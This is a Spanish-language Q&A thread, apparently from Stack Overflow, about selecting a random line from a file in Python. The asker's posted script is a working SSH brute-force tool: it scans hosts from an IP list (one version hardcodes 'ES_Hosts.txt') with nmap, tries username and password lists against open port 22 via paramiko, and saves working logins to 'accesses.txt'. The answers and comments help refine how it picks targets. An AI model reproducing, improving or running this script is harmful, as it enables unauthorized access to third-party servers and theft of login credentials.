# ¿Cómo seleccionar de manera aleatoria el texto de una línea en python?

Tags: python, python-3.x

Este es el procedimiento de lectura línea por línea.

```
def main():
    dicc = input("Por favor, selecciona un diccionario => ")
    with open(dicc,"r+") as f:
        for ip in f:
            nm = nmap.PortScanner()
```

Pero me gustaría seleccionar una IP de una línea aleatoria del archivo sin modificar mucho el código. Me siento perdido, espero su ayuda.

comparto el código completo:

```
import os, sys, time, paramiko, nmap, random

def main():
    dicc = input("Por favor, selecciona un diccionario => ")
    with open(dicc,"r+") as f:
        for ip in f:
            nm = nmap.PortScanner()
            nm.scan(hosts=ip,arguments='-Pn -p22')
            try:
                host_status = nm[ip].state()
                ssh_status = nm[ip]['tcp'][22]['state']
                if ssh_status == "OPEN":
                    print(f"HOST: {ip} | SSH STATUS: OPEN")
                    usernames = open("usernames.txt","r")
                    passwords = open("passwords.txt","r")
                    for username in usernames:
                        for password in passwords:
                            try:
                                client = paramiko.SSHClient()
                                client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
                                client.connect(ip,port=22,username=username,password=password)
                                with open("accesses.txt","r+") as credentials:
                                    data = ip+":"+username+":"+password+"\n"
                                    credentials.write(data)
                            except:
                                time.sleep(3)
                else:
                    print("Se realizo una conexión con el host remoto pero el servicio SSH no se encontró abierto.")
            except:
                print(f"No se pudo conectar con el host: {ip}")

if __name__ == '__main__':
    os.system("cls")
    main()
```

Ahora, el nuevo problema es el siguiente y adjunto la última edición basándome en la ayuda comunitaria: Selecciona una línea aleatoria y empieza a contar desde esta línea pero, no selecciona nuevamente una línea aleatoria.

```
def main():
    dicc = input("Por favor, selecciona un diccionario => ")
    with open(dicc,"r+") as f:
        numlines = sum(1 for _ in f)
        f.seek(0)
        random_line = random.randrange(numlines)
        for index, line in enumerate(f):
            if index == random_line:
                ip = line
                for ip in f:
                    nm = nmap.PortScanner()
                    nm.scan(hosts=ip,arguments='-Pn -p22')
                    try:
                        host_status = nm[ip].state()
                        ssh_status = nm[ip]['tcp'][22]['state']
                        if ssh_status == "OPEN":
                            print(f"HOST: {ip} | SSH STATUS: OPEN")
                            usernames = open("usernames.txt","r")
                            passwords = open("passwords.txt","r")
                            for username in usernames:
                                for password in passwords:
                                    try:
                                        client = paramiko.SSHClient()
                                        client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
                                        client.connect(ip,port=22,username=username,password=password)
                                        with open("accesses.txt","r+") as credentials:
                                            data = ip+":"+username+":"+password+"\n"
                                            credentials.write(data)
                                    except:
                                        time.sleep(3)
                        else:
                            print(f"Se realizo una conexión con el host {ip} pero el servicio SSH no se encontró abierto.")
                    except:
                        print(f"No se pudo conectar con el host: {ip}")
if __name__ == '__main__':
    os.system("cls")
    main()
```

Última solución: Añadir directamente el diccionario en el código y ejecutar main()

cada vez que no realiza la conexión:

```
import os, sys, time, paramiko, nmap, random

def main():
    dicc = "ES_Hosts.txt"
    with open(dicc,"r+") as f:
        numlines = sum(1 for _ in f)
        f.seek(0)
        random_line = random.randrange(numlines)
        for index, line in enumerate(f):
            if index == random_line:
                ip = line
                for ip in f:
                    nm = nmap.PortScanner()
                    nm.scan(hosts=ip,arguments='-Pn -p22')
                    try:
                        host_status = nm[ip].state()
                        ssh_status = nm[ip]['tcp'][22]['state']
                        if ssh_status == "OPEN":
                            print(f"HOST: {ip} | SSH STATUS: OPEN")
                            usernames = open("usernames.txt","r")
                            passwords = open("passwords.txt","r")
                            for username in usernames:
                                for password in passwords:
                                    try:
                                        client = paramiko.SSHClient()
                                        client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
                                        client.connect(ip,port=22,username=username,password=password)
                                        with open("accesses.txt","r+") as credentials:
                                            data = ip+":"+username+":"+password+"\n"
                                            credentials.write(data)
                                    except:
                                        time.sleep(3)
                        else:
                            print(f"Se realizo una conexión con el host {ip} pero el servicio SSH no se encontró abierto.")
                            main()

                    except:
                        print(f"No se pudo conectar con el host: {ip}")
                        main()

if __name__ == '__main__':
    os.system("cls")
    main()
```

Comment: No se me ocurre una forma en la que no haya que modificar mucho en código

Comment: ¿Podrías explicar cómo hacerlo aunque tenga que editar mucho el código? Acabo de compartir el código completo.

Answer (score 3):

#### Solución si el archivo pesa poco

```
random.choice(file.read().splitlines())
```

Este código simplemente lee todo el contenido del archivo, lo separa en lineas y elige una linea al azar.

Pero esta forma no es buena si tu archivo pesa o puede llegar a pesar, por ejemplo 1 gb. Esto se debe a que se carga en memoria en simultaneo todas las lineas. Y no creo que quieras 1 gb de información en memoria. Sin contar que la memoria podría no ser capáz de soportar tanto.

#### Solución a prueba de exceso de uso de memoria

Cuando iteramos sobre un archivo (es decir, lo recorremos con un bucle for), no se cargan en memoria todas las lineas. En su lugar, se le de a una linea cada vez. Esto siempre es util para lidiar con archivos grandes.

Siendo la variable file el archivo que estamos leyendo, el siguiente código puede ser aplicado:

```
# Obtenemos el número de lineas total en el archivo.
# Al usar una comprensión de generador, evitamos crear una lista llena de unos.
numlines = sum(1 for _ in file)

# Como al iterar sobre el archivo terminamos moviendo el cursor al final, 
# lo volvemos a poner al inicio del archivo.
file.seek(0)

# Elegimos un número de linea aleatorio (contando desde 0)
random_line = random.randrange(numlines)

# Volvemos a recorrer el archivo hasta encontrar la linea elegida y terminamos el bucle.
# Si todo funcionó correctamente, la variable line contendrá la linea elegida aleatoriamente.
for index, line in enumerate(file):
    if index == random_line:
        break

print(line)
```

A tener en cuenta:

- Se asume que el archivo tiene al menos una linea.
- Cada linea devuelta al iterar sobre el archivo siempre incluye el salto de linea. Es decir, si tenés `a\nb\nc` cada linea será leida así `"a\n" "b\n" "c"`. Para evitar este escenario, hay que quitar todos los saltos de linea al final, lo cual se logra con `linea.rstrip("\n")`

Comment: Todo tu argumento me ha ayudado a seleccionar una línea aleatoria, pero, selecciona una línea aleatoria y empieza a contar de uno en uno otra vez, en vez de seleccionar una IP totalmente distinta, te comparto código arriba.

Comment: Disculpe caballero, al final, resulta que he podido arreglar el script con su ayuda pero tengo un problema y es qué rstrip("\n") no está eliminando el salto de línea. (ya solucionado)

Comment: Eso es por que vos mismo se lo estás pidiendo. Luego de seleccionar la linea aleatoria, empiezas a recorrer el archivo linea por linea especificamente aquí: for ip in f. Si querés seleccionar siempre un ip aleatorio, ejecuta el código que procesa la ip (no el bucle for) en dicha linea. Si querés que repita el proceso todo el tiempo, envuelve el código en un while, moviendo el cursor al principio del archivo cada vez que llegues al final del bucle usando file.seek(0). Igual, me surgió una pregunta, las ips pueden probarse más de una vez?